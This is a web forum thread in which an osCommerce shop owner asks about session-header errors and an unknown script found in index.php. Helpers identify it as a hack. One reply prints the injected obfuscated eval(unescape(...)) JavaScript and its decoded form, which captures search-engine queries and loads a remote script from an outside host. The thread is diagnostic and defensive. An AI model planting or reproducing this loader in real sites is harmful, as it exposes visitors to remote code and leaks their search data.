Help needed, script error

[Guest]

Hello Forum

 

I entered the site (gbn.ge) and suddenly noticed this error on the top

 

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home1/forexthi/public_html/gbn.ge/index.php:1) in /home1/forexthi/public_html/gbn.ge/includes/functions/sessions.php on line 97

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home1/forexthi/public_html/gbn.ge/index.php:1) in /home1/forexthi/public_html/gbn.ge/includes/functions/sessions.php on line 97

 

I do not know how to correct it, it happened suddenly, I did not do anything, yesterday there was nothing today there is error

 

also I have one question 1 month earlier I had such error, there was big gap on the top of site, I entered in index file and there was unknown script which I had never inserted there, I removed this script and site was back to normal what do you think, some one hacked or it's because of hosting? (hostmonter.com)

 

thanks in advance

[spooks]

headers already sent is usually due to whitespace in a file(s) http://www.oscommerce.info/kb/osCommerce/Common_Problems/15

 

it sounds like you have had/are having hacking issues, perhaps they have messed your files?

 

http://www.oscommerce.com/forums/index.php?showtopic=313323

[germ]

This is in the top of the file:

 

<script>eval( unescape( "%69%66%28%21%6d%79%69%6b%29%7b%0d%0a%76%61%72%20%72%3d%64%6f%63%75%6d%65%6e%74%2e%72%65%66%65%72%72%65%72%2c%75%3d%64%6f%63%75%6d%65%6e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%65%2c%73%65%3d%22%67%62%22%3b%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%67%6f%6f%67%6c%65%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%67%6f%6f%67%6c%65%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%6d%73%6e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%65%3d%22%6d%73%6e%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%68%6f%6f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%65%3d%22%79%61%68%6f%6f%22%3b%7d%0d%0a%69%66%28%72%2e%69%6e%64%65%78%4f%66%28%22%79%61%6e%64%65%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%65%78%74%22%3b%73%65%3d%22%79%61%6e%64%65%78%2e%72%75%22%3b%7d%0d%0a%69%66%28%74%2e%6c%65%6e%67%74%68&&%28%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%69%6e%64%65%78%4f%66%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%65%3d%72%2e%73%75%62%73%74%72%69%6e%67%28%71%2b%32%2b%74%2e%6c%65%6e%67%74%68%29%2e%73%70%6c%69%74%28%22&%22%29%5b%30%5d%3b%0d%0a%69%66%20%28%28%71%75%65%2e%69%6e%64%65%78%4f%66%28%27%73%69%74%65%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%65%2e%74%6f%4c%6f%77%65%72%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%22%3c%73%63%72%69%70%74%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%65%73%74%34%79%6f%75%2e%69%66%2e%75%61%2f%6a%73%2f%62%69%64%63%68%2e%6a%73%3f%71%3d%22%2b%71%75%65%2b%22&%72%65%66%3d%22%2b%72%2b%22%27%3e%3c%2f%73%63%22%2b%22%72%69%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76%61%72%20%6d%79%69%6b%3d%74%72%75%65%3b" ));</script>

Which decodes to:

 

if(!myik){
var r=document.referrer,u=document.URL,t="",q,que,se="gb";
if(r.indexOf("google.")!=-1){t="q";se="google";}
if(r.indexOf("msn.")!=-1){t="q";se="msn";}
if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
if(t.length((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf(""+t+"="))!=-1)){ que=r.substring(q+2+t.length).split("")[0];
if ((que.indexOf('site:')==-1)  (que.toLowerCase().indexOf('www.')==-1))
document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"ref="+r+"'></sc"+"ript>");
}
}
var myik=true;

Looks like a hack to me.

:o

[Guest]

I removed the script and opened support ticket in my hosting company

 

it happens second time

 

thanks for help